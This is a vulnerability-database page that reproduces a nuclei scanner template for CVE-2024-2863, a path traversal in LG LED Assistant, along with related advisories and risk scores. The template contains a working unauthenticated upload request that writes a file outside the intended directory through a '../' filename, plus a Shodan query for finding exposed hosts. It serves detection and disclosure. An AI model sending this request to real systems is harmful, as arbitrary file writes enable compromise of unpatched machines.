Lucene search
K

LG LED Assistant - Thumbnail Path Traversal File Upload

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

LG LED Assistant path traversal allows unauthenticated file upload to arbitrary disk locations via /api/thumbnail.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-2863
15 Jan 202621:03
circl
CNNVD
LG LED Assistant 安全漏洞
25 Mar 202400:00
cnnvd
CVE
CVE-2024-2863
25 Mar 202406:39
cve
Cvelist
CVE-2024-2863 Path traversal via file upload on LG LED Assistant
25 Mar 202406:39
cvelist
NVD
CVE-2024-2863
25 Mar 202407:15
nvd
Positive Technologies
PT-2024-22498
24 Mar 202400:00
ptsecurity
RedhatCVE
CVE-2024-2863
23 May 202510:02
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-2863
14 Jan 202600:00
vulncheck_kev
Vulnrichment
CVE-2024-2863 Path traversal via file upload on LG LED Assistant
25 Mar 202406:39
vulnrichment
id: CVE-2024-2863

info:
  name: LG LED Assistant - Thumbnail Path Traversal File Upload
  author: beginee
  severity: high
  description: |
    A path traversal vulnerability exists in the endpoint handler for /api/thumbnail in Common.js. An unauthenticated remote attacker can exploit this to upload arbitrary files to any location on the disk drive where the product is installed.
  reference:
    - https://www.tenable.com/security/research/tra-2024-08
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2863
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2863
    cwe-id: CWE-22
    epss-score: 0.66969
    epss-percentile: 0.99205
  metadata:
    verified: true
    max-request: 1
    shodan-query: 'http.title:"LG LED Assistant" OR http.title:"LED Assistant"'
  tags: cve,cve2024,lg,lfi,file-upload,thumbnail,traversal,vkev

variables:
  target_filename: "/../../../../../../Users/Public/poc_test.txt"
  target_fileStr: "bWFsaWNpb3VzIGNvbnRlbnQ%3d"

http:
  - raw:
      - |
        POST /api/thumbnail HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        fileName={{target_filename}}&fileStr={{target_fileStr}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"resCode\":\"SUCCESS\"}")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100d9852e01cb4b978fc7d48535548f4975b50726ab9fe31cd77929a4f641ee8499022004e807db2b4de3e805ad300a021ba510ab0a11d608b955eaf8d26ebf553bd662:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.15.3 - 9.8
EPSS0.66969
SSVC
13